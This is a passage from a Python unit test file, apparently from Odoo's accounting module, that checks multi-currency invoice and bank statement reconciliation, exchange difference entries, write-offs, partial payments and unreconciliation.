'quantity': 1,
'price_unit': invoice_amount,
'invoice_id': invoice.id,
'name': 'product that cost ' + str(invoice_amount),
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
#validate invoice
invoice.action_invoice_open()
return invoice
def create_invoice_partner(self, type='out_invoice', invoice_amount=50, currency_id=None, partner_id=False):
#we create an invoice in given currency
invoice = self.account_invoice_model.create({'partner_id': partner_id,
'currency_id': currency_id,
'name': type == 'out_invoice' and 'invoice to client' or 'invoice to vendor',
'account_id': self.account_rcv.id,
'type': type,
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': invoice_amount,
'invoice_id': invoice.id,
'name': 'product that cost ' + str(invoice_amount),
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
#validate invoice
invoice.action_invoice_open()
return invoice
def make_payment(self, invoice_record, bank_journal, amount=0.0, amount_currency=0.0, currency_id=None):
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': bank_journal.id,
'date': time.strftime('%Y') + '-07-15',
'name': 'payment' + invoice_record.number
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': amount,
'amount_currency': amount_currency,
'currency_id': currency_id,
'date': time.strftime('%Y') + '-07-15',})
#reconcile the payment with the invoice
for l in invoice_record.move_id.line_ids:
if l.account_id.id == self.account_rcv.id:
line_id = l
break
amount_in_widget = currency_id and amount_currency or amount
bank_stmt_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': line_id,
'debit': amount_in_widget < 0 and -amount_in_widget or 0.0,
'credit': amount_in_widget > 0 and amount_in_widget or 0.0,
'name': line_id.name,
}])
return bank_stmt
def make_customer_and_supplier_flows(self, invoice_currency_id, invoice_amount, bank_journal, amount, amount_currency, transaction_currency_id):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(type='out_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=amount, amount_currency=amount_currency, currency_id=transaction_currency_id)
customer_move_lines = bank_stmt.move_line_ids
#we create a supplier bill in given invoice_currency
invoice_record = self.create_invoice(type='in_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=-amount, amount_currency=-amount_currency, currency_id=transaction_currency_id)
supplier_move_lines = bank_stmt.move_line_ids
return customer_move_lines, supplier_move_lines
@tagged('post_install', '-at_install')
class TestReconciliationExec(TestReconciliation):
def test_statement_usd_invoice_eur_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_euro_id, 30, self.bank_journal_usd, 42, 30, self.currency_euro_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 30.0, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 30.0, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 30.0, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
{'debit': 30.0, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
])
def test_statement_usd_invoice_usd_transaction_usd(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_usd, 50, 0, False)
self.assertRecordValues(customer_move_lines, [
{'debit': 32.70, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 32.70, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 32.70, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 32.70, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
def test_statement_usd_invoice_usd_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_usd, 50, 40, self.currency_euro_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 7.30, 'account_id': self.diff_income_account.id},
{'debit': 7.30, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 7.30, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 7.30, 'account_id': self.account_rcv.id},
])
def test_statement_usd_invoice_chf_transaction_chf(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_swiss_id, 50, self.bank_journal_usd, 42, 50, self.currency_swiss_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 27.47, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 27.47, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 10.74, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 10.74, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 27.47, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
{'debit': 27.47, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 10.74, 'account_id': self.diff_income_account.id},
{'debit': 10.74, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
def test_statement_eur_invoice_usd_transaction_usd(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 40, 50, self.currency_usd_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 7.30, 'account_id': self.diff_income_account.id},
{'debit': 7.30, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 7.30, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 7.30, 'account_id': self.account_rcv.id},
])
def test_statement_eur_invoice_usd_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 40, 0.0, False)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': 0.0, 'currency_id': False},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
])
def test_statement_euro_invoice_usd_transaction_chf(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 42, 50, self.currency_swiss_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 42.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
{'debit': 0.0, 'credit': 42.0, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 42.0, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
{'debit': 42.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
])
def test_statement_euro_invoice_usd_transaction_euro_full(self):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(type='out_invoice', invoice_amount=50, currency_id=self.currency_usd_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-01-01',
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': 40,
'date': time.strftime('%Y') + '-01-01',})
#reconcile the payment with the invoice
for l in invoice_record.move_id.line_ids:
if l.account_id.id == self.account_rcv.id:
line_id = l
break
bank_stmt_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': line_id,
'debit': 0.0,
'credit': 32.7,
'name': 'test_statement_euro_invoice_usd_transaction_euro_full',
}], new_aml_dicts=[{
'debit': 0.0,
'credit': 7.3,
'name': 'exchange difference',
'account_id': self.diff_income_account.id
}])
self.assertRecordValues(bank_stmt.move_line_ids, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 32.7, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 7.3, 'amount_currency': 0.0, 'currency_id': False},
])
# The invoice should be paid, as the payments totally cover its total
self.assertEquals(invoice_record.state, 'paid', 'The invoice should be paid by now')
invoice_rec_line = invoice_record.move_id.line_ids.filtered(lambda x: x.account_id.reconcile)
self.assertTrue(invoice_rec_line.reconciled, 'The invoice should be totally reconciled')
self.assertTrue(invoice_rec_line.full_reconcile_id, 'The invoice should have a full reconcile number')
self.assertEquals(invoice_rec_line.amount_residual, 0, 'The invoice should be totally reconciled')
self.assertEquals(invoice_rec_line.amount_residual_currency, 0, 'The invoice should be totally reconciled')
@unittest.skip('adapt to new accounting')
def test_balanced_exchanges_gain_loss(self):
# The point of this test is to show that we handle correctly the gain/loss exchanges during reconciliations in foreign currencies.
# For instance, with a company set in EUR, and a USD rate set to 0.033,
# the reconciliation of an invoice of 2.00 USD (60.61 EUR) and a bank statement of two lines of 1.00 USD (30.30 EUR)
# will lead to an exchange loss, that should be handled correctly within the journal items.
env = api.Environment(self.cr, self.uid, {})
# We update the currency rate of the currency USD in order to force the gain/loss exchanges in next steps
rateUSDbis = env.ref("base.rateUSDbis")
rateUSDbis.write({
'name': time.strftime('%Y-%m-%d') + ' 00:00:00',
'rate': 0.033,
})
# We create a customer invoice of 2.00 USD
invoice = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'Foreign invoice with exchange gain',
'account_id': self.account_rcv_id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y-%m-%d'),
'journal_id': self.bank_journal_usd_id,
'invoice_line': [
(0, 0, {
'name': 'line that will lead to an exchange gain',
'quantity': 1,
'price_unit': 2,
})
]
})
invoice.action_invoice_open()
# We create a bank statement with two lines of 1.00 USD each.
statement = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_usd_id,
'date': time.strftime('%Y-%m-%d'),
'line_ids': [
(0, 0, {
'name': 'half payment',
'partner_id': self.partner_agrolait_id,
'amount': 1.0,
'date': time.strftime('%Y-%m-%d')
}),
(0, 0, {
'name': 'second half payment',
'partner_id': self.partner_agrolait_id,
'amount': 1.0,
'date': time.strftime('%Y-%m-%d')
})
]
})
# We process the reconciliation of the invoice line with the two bank statement lines
line_id = None
for l in invoice.move_id.line_id:
if l.account_id.id == self.account_rcv_id:
line_id = l
break
for statement_line in statement.line_ids:
statement_line.process_reconciliation([
{'counterpart_move_line_id': line_id.id, 'credit': 1.0, 'debit': 0.0, 'name': line_id.name}
])
# The invoice should be paid, as the payments totally cover its total
self.assertEquals(invoice.state, 'paid', 'The invoice should be paid by now')
reconcile = None
for payment in invoice.payment_ids:
reconcile = payment.reconcile_id
break
# The invoice should be reconciled (entirely, not a partial reconciliation)
self.assertTrue(reconcile, 'The invoice should be totally reconciled')
result = {}
exchange_loss_line = None
for line in reconcile.line_id:
res_account = result.setdefault(line.account_id, {'debit': 0.0, 'credit': 0.0, 'count': 0})
res_account['debit'] = res_account['debit'] + line.debit
res_account['credit'] = res_account['credit'] + line.credit
res_account['count'] += 1
if line.credit == 0.01:
exchange_loss_line = line
# We should be able to find a move line of 0.01 EUR on the Debtors account, being the cent we lost during the currency exchange
self.assertTrue(exchange_loss_line, 'There should be one move line of 0.01 EUR in credit')
# The journal items of the reconciliation should have their debit and credit total equal
# Besides, the total debit and total credit should be 60.61 EUR (2.00 USD)
self.assertEquals(sum(res['debit'] for res in result.values()), 60.61)
self.assertEquals(sum(res['credit'] for res in result.items()), 60.61)
counterpart_exchange_loss_line = None
for line in exchange_loss_line.move_id.line_id:
if line.account_id.id == self.account_fx_expense_id:
counterpart_exchange_loss_line = line
# We should be able to find a move line of 0.01 EUR on the Foreign Exchange Loss account
self.assertTrue(counterpart_exchange_loss_line, 'There should be one move line of 0.01 EUR on account "Foreign Exchange Loss"')
def test_manual_reconcile_wizard_opw678153(self):
def create_move(name, amount, amount_currency, currency_id):
debit_line_vals = {
'name': name,
'debit': amount > 0 and amount or 0.0,
'credit': amount < 0 and -amount or 0.0,
'account_id': self.account_rcv.id,
'amount_currency': amount_currency,
'currency_id': currency_id,
}
credit_line_vals = debit_line_vals.copy()
credit_line_vals['debit'] = debit_line_vals['credit']
credit_line_vals['credit'] = debit_line_vals['debit']
credit_line_vals['account_id'] = self.account_rsa.id
credit_line_vals['amount_currency'] = -debit_line_vals['amount_currency']
vals = {
'journal_id': self.bank_journal_euro.id,
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
return self.env['account.move'].create(vals).id
move_list_vals = [
('1', -1.83, 0, self.currency_swiss_id),
('2', 728.35, 795.05, self.currency_swiss_id),
('3', -4.46, 0, self.currency_swiss_id),
('4', 0.32, 0, self.currency_swiss_id),
('5', 14.72, 16.20, self.currency_swiss_id),
('6', -737.10, -811.25, self.currency_swiss_id),
]
move_ids = []
for name, amount, amount_currency, currency_id in move_list_vals:
move_ids.append(create_move(name, amount, amount_currency, currency_id))
aml_recs = self.env['account.move.line'].search([('move_id', 'in', move_ids), ('account_id', '=', self.account_rcv.id), ('reconciled', '=', False)])
aml_recs.reconcile()
for aml in aml_recs:
self.assertTrue(aml.reconciled, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual, 0, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual_currency, 0, 'The journal item should be totally reconciled')
move_list_vals = [
('2', 728.35, 795.05, self.currency_swiss_id),
('3', -4.46, 0, False),
('4', 0.32, 0, False),
('5', 14.72, 16.20, self.currency_swiss_id),
('6', -737.10, -811.25, self.currency_swiss_id),
]
move_ids = []
for name, amount, amount_currency, currency_id in move_list_vals:
move_ids.append(create_move(name, amount, amount_currency, currency_id))
aml_recs = self.env['account.move.line'].search([('move_id', 'in', move_ids), ('account_id', '=', self.account_rcv.id), ('reconciled', '=', False)])
aml_recs.reconcile(self.account_rsa, self.bank_journal_usd)
for aml in aml_recs:
self.assertTrue(aml.reconciled, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual, 0, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual_currency, 0, 'The journal item should be totally reconciled')
def test_manual_reconcile_wizard_same_account(self):
move_ids = self.env['account.move']
debit_line_vals = {
'name': '1',
'debit': 728.35,
'credit': 0.0,
'account_id': self.account_rcv.id,
'amount_currency': 795.05,
'currency_id': self.currency_swiss_id,
}
credit_line_vals = {
'name': '1',
'debit': 0.0,
'credit': 728.35,
'account_id': self.account_rsa.id,
'amount_currency': -795.05,
'currency_id': self.currency_swiss_id,
}
vals = {
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-02-15',
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
move_ids += self.env['account.move'].create(vals)
debit_line_vals = {
'name': '2',
'debit': 0.0,
'credit': 737.10,
'account_id': self.account_rcv.id,
'amount_currency': -811.25,
'currency_id': self.currency_swiss_id,
}
credit_line_vals = {
'name': '2',
'debit': 737.10,
'credit': 0.0,
'account_id': self.account_rsa.id,
'amount_currency': 811.25,
'currency_id': self.currency_swiss_id,
}
vals = {
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-07-15',
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
move_ids += self.env['account.move'].create(vals)
account_move_line = move_ids.mapped('line_ids').filtered(lambda l: l.account_id == self.account_rcv)
writeoff_vals = [{
'account_id': self.account_rcv.id,
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-04-15',
'debit': 8.75,
'credit': 0.0
}]
writeoff_line = account_move_line._create_writeoff(writeoff_vals)
(account_move_line + writeoff_line).reconcile()
self.assertEquals(len(writeoff_line), 1, "The writeoff_line (balance_line) should have only one moves line")
self.assertTrue(all(l.reconciled for l in writeoff_line), 'The balance lines should be totally reconciled')
self.assertTrue(all(l.reconciled for l in account_move_line), 'The move lines should be totally reconciled')
def test_reconcile_bank_statement_with_payment_and_writeoff(self):
# Use case:
# Company is in EUR, create a bill for 80 USD and register payment of 80 USD.
# create a bank statement in USD bank journal with a bank statement line of 85 USD
# Reconcile bank statement with payment and put the remaining 5 USD in bank fees or another account.
invoice = self.create_invoice(type='out_invoice', invoice_amount=80, currency_id=self.currency_usd_id)
# register payment on invoice
payment = self.env['account.payment'].create({'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 80,
'currency_id': self.currency_usd_id,
'payment_date': time.strftime('%Y') + '-07-15',
'journal_id': self.bank_journal_usd.id,
})
payment.post()
payment_move_line = False
bank_move_line = False
for l in payment.move_line_ids:
if l.account_id.id == self.account_rcv.id:
payment_move_line = l
else:
bank_move_line = l
invoice.register_payment(payment_move_line)
# create bank statement
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_usd.id,
'date': time.strftime('%Y') + '-07-15',
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': 85,
'date': time.strftime('%Y') + '-07-15',})
#reconcile the statement with invoice and put remaining in another account
bank_stmt_line.process_reconciliation(payment_aml_rec= bank_move_line, new_aml_dicts=[{
'account_id': self.diff_income_account.id,
'debit': 0,
'credit': 5,
'name': 'bank fees',
}])
# Check that move lines associated to bank_statement are correct
bank_stmt_aml = self.env['account.move.line'].search([('statement_id', '=', bank_stmt.id)])
bank_stmt_aml |= bank_stmt_aml.mapped('move_id').mapped('line_ids')
self.assertEquals(len(bank_stmt_aml), 4, "The bank statement should have 4 moves lines")
lines = {
self.account_usd.id: [
{'debit': 3.27, 'credit': 0.0, 'amount_currency': 5, 'currency_id': self.currency_usd_id},
{'debit': 52.33, 'credit': 0, 'amount_currency': 80, 'currency_id': self.currency_usd_id}
],
self.diff_income_account.id: {'debit': 0.0, 'credit': 3.27, 'amount_currency': -5, 'currency_id': self.currency_usd_id},
self.account_rcv.id: {'debit': 0.0, 'credit': 52.33, 'amount_currency': -80, 'currency_id': self.currency_usd_id},
}
payments = bank_stmt_aml.mapped('payment_id')
# creation and reconciliation of the over-amount statement
# has created an another payment
self.assertEqual(len(payments), 2)
# Check amount of second, automatically created payment
self.assertEqual((payments - payment).amount, 5)
for aml in bank_stmt_aml:
line = lines[aml.account_id.id]
if type(line) == list:
# find correct line inside the list
if line[0]['debit'] == round(aml.debit, 2):
line = line[0]
else:
line = line[1]
self.assertEquals(round(aml.debit, 2), line['debit'])
self.assertEquals(round(aml.credit, 2), line['credit'])
self.assertEquals(round(aml.amount_currency, 2), line['amount_currency'])
self.assertEquals(aml.currency_id.id, line['currency_id'])
def test_partial_reconcile_currencies_01(self):
# client Account (payable, rsa)
# Debit Credit
# --------------------------------------------------------
# Pay a : 25/0.5 = 50 | Inv a : 50/0.5 = 100
# Pay b: 50/0.75 = 66.66 | Inv b : 50/0.75 = 66.66
# Pay c: 25/0.8 = 31.25 |
#
# Debit_currency = 100 | Credit currency = 100
# Debit = 147.91 | Credit = 166.66
# Balance Debit = 18.75
# Counterpart Credit goes in Exchange diff
dest_journal_id = self.env['account.journal'].search([('type', '=', 'purchase'), ('company_id', '=', self.env.ref('base.main_company').id)], limit=1)
account_expenses = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_expenses').id)], limit=1)
self.bank_journal_euro.write({'default_debit_account_id': self.account_rsa.id,
'default_credit_account_id': self.account_rsa.id})
dest_journal_id.write({'default_debit_account_id': self.account_rsa.id,
'default_credit_account_id': self.account_rsa.id})
# Setting up rates for USD (main_company is in EUR)
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '07' + '-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '08' + '-01',
'rate': 0.75,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '09' + '-01',
'rate': 0.80,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
# Preparing Invoices (from vendor)
invoice_a = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'invoice to vendor',
'account_id': self.account_rsa.id,
'type': 'in_invoice',
'date_invoice': time.strftime('%Y') + '-' + '07' + '-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice_a.id,
'name': 'product that cost ' + str(50),
'account_id': account_expenses.id,
})
invoice_b = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'invoice to vendor',
'account_id': self.account_rsa.id,
'type': 'in_invoice',
'date_invoice': time.strftime('%Y') + '-' + '08' + '-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice_b.id,
'name': 'product that cost ' + str(50),
'account_id': account_expenses.id,
})
invoice_a.action_invoice_open()
invoice_b.action_invoice_open()
# Preparing Payments
# One partial for invoice_a (fully assigned to it)
payment_a = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '07' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
# One that will complete the payment of a, the rest goes to b
payment_b = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 50,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '08' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
# The last one will complete the payment of b
payment_c = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '09' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
payment_a.post()
payment_b.post()
payment_c.post()
# Assigning payments to invoices
debit_line_a = payment_a.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
debit_line_b = payment_b.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
debit_line_c = payment_c.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
invoice_a.assign_outstanding_credit(debit_line_a.id)
invoice_a.assign_outstanding_credit(debit_line_b.id)
invoice_b.assign_outstanding_credit(debit_line_b.id)
invoice_b.assign_outstanding_credit(debit_line_c.id)
# Asserting correctness (only in the payable account)
full_reconcile = False
for inv in (invoice_a + invoice_b):
self.assertTrue(inv.reconciled)
for aml in (inv.payment_move_line_ids + inv.move_id.line_ids).filtered(lambda l: l.account_id == self.account_rsa):
self.assertEqual(aml.amount_residual, 0.0)
self.assertEqual(aml.amount_residual_currency, 0.0)
self.assertTrue(aml.reconciled)
if not full_reconcile:
full_reconcile = aml.full_reconcile_id
else:
self.assertTrue(aml.full_reconcile_id == full_reconcile)
full_rec_move = full_reconcile.exchange_move_id
# Globally check whether the amount is correct
self.assertEqual(full_rec_move.amount, 18.75)
# Checking if the direction of the move is correct
full_rec_payable = full_rec_move.line_ids.filtered(lambda l: l.account_id == self.account_rsa)
self.assertEqual(full_rec_payable.balance, 18.75)
def test_unreconcile(self):
# Use case:
# 2 invoices paid with a single payment. Unreconcile the payment with one invoice, the
# other invoice should remain reconciled.
inv1 = self.create_invoice(invoice_amount=10, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(invoice_amount=20, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 100,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
# Check residual before assignation
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 20)
# Assign credit and residual
inv1.assign_outstanding_credit(credit_aml.id)
inv2.assign_outstanding_credit(credit_aml.id)
self.assertAlmostEquals(inv1.residual, 0)
self.assertAlmostEquals(inv2.residual, 0)
# Unreconcile one invoice at a time and check residual
credit_aml.with_context(invoice_id=inv1.id).remove_move_reconcile()
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 0)
credit_aml.with_context(invoice_id=inv2.id).remove_move_reconcile()
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 20)
def test_unreconcile_exchange(self):
# Use case:
# - Company currency in EUR
# - Create 2 rates for USD:
# 1.0 on 2018-01-01
# 0.5 on 2018-02-01
# - Create an invoice on 2018-01-02 of 111 USD
# - Register a payment on 2018-02-02 of 111 USD
# - Unreconcile the payment
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-08-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv = self.create_invoice(invoice_amount=111, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 111,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': time.strftime('%Y') + '-08-01',
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
# Check residual before assignation
self.assertAlmostEquals(inv.residual, 111)
# Assign credit, check exchange move and residual
inv.assign_outstanding_credit(credit_aml.id)
self.assertEqual(len(payment.move_line_ids.mapped('full_reconcile_id').exchange_move_id), 1)
self.assertAlmostEquals(inv.residual, 0)
# Unreconcile invoice and check residual
credit_aml.with_context(invoice_id=inv.id).remove_move_reconcile()
self.assertAlmostEquals(inv.residual, 111)
def test_revert_payment_and_reconcile(self):
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': '2018-06-04',
'amount': 666,
})
payment.post()
self.assertEqual(len(payment.move_line_ids), 2)
bank_line = payment.move_line_ids.filtered(lambda l: l.account_id.id == self.bank_journal_usd.default_debit_account_id.id)
customer_line = payment.move_line_ids - bank_line
self.assertEqual(len(bank_line), 1)
self.assertEqual(len(customer_line), 1)
self.assertNotEqual(bank_line.id, customer_line.id)
self.assertEqual(bank_line.move_id.id, customer_line.move_id.id)
